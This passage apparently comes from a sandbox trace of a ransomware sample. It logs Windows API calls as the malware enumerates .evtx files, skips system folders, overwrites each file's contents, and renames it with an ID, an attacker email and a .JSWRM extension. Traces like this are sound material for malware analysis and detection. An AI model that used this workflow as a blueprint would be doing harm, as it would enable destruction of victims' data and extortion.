lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0065.049] CloseHandle (hObject=0x450) returned 1 [0065.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0065.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0065.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0065.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0065.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0065.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0065.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0065.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0065.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.071] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0065.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0065.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0065.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.072] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Operational.evtx", cAlternateFileName="MIF8AA~1.EVT")) returned 1 [0065.072] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2=".") returned 1 [0065.072] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="..") returned 1 [0065.072] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="...") returned 1 [0065.072] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="windows") returned -1 [0065.072] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="recovery") returned -1 [0065.072] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="perflogs") returned -1 [0065.072] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.072] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.072] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="system volume information") returned -1 [0065.072] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="msocache") returned -1 [0065.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0065.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppReadiness%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0065.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppReadiness%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x20de78, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppReadiness%4Operational.evtx", lpUsedDefaultChar=0x0) returned 48 [0065.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0065.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0065.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppReadiness%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0065.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppReadiness%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x20e418, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppReadiness%4Operational.evtx", lpUsedDefaultChar=0x0) returned 48 [0065.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0065.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0065.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0065.073] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.075] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1118208) returned 1 [0065.075] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0065.075] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0065.087] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.087] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0065.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0065.088] CloseHandle (hObject=0x450) returned 1 [0065.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0065.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0065.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0065.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0065.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0065.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ef08 [0065.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.134] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0065.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0065.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0065.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.135] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeployment%4Operational.evtx", cAlternateFileName="MI34FE~1.EVT")) returned 1 [0065.135] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2=".") returned 1 [0065.135] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="..") returned 1 [0065.135] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="...") returned 1 [0065.135] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="windows") returned -1 [0065.135] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="recovery") returned -1 [0065.135] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="perflogs") returned -1 [0065.135] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.135] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.135] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="system volume information") returned -1 [0065.135] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="msocache") returned -1 [0065.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0065.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeployment%4Operational.evtx", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0065.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeployment%4Operational.evtx", cchWideChar=50, lpMultiByteStr=0x20e268, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpUsedDefaultChar=0x0) returned 50 [0065.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0065.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0065.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeployment%4Operational.evtx", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0065.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeployment%4Operational.evtx", cchWideChar=50, lpMultiByteStr=0x20e418, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpUsedDefaultChar=0x0) returned 50 [0065.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0065.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0065.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0065.136] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.136] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.136] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0065.136] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.141] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.141] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0065.142] CloseHandle (hObject=0x450) returned 1 [0065.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0065.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0065.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0065.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f030 [0065.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.144] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0065.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0065.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0065.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.145] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x211000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cAlternateFileName="MIA24C~1.EVT")) returned 1 [0065.145] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2=".") returned 1 [0065.145] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="..") returned 1 [0065.145] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="...") returned 1 [0065.145] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="windows") returned -1 [0065.145] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="recovery") returned -1 [0065.145] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="perflogs") returned -1 [0065.145] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.145] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.145] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="system volume information") returned -1 [0065.145] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="msocache") returned -1 [0065.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0065.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0065.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cchWideChar=56, lpMultiByteStr=0x20e268, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0065.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0065.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0065.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0065.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cchWideChar=56, lpMultiByteStr=0x20e418, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0065.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0065.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0065.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0065.145] CreateFileW 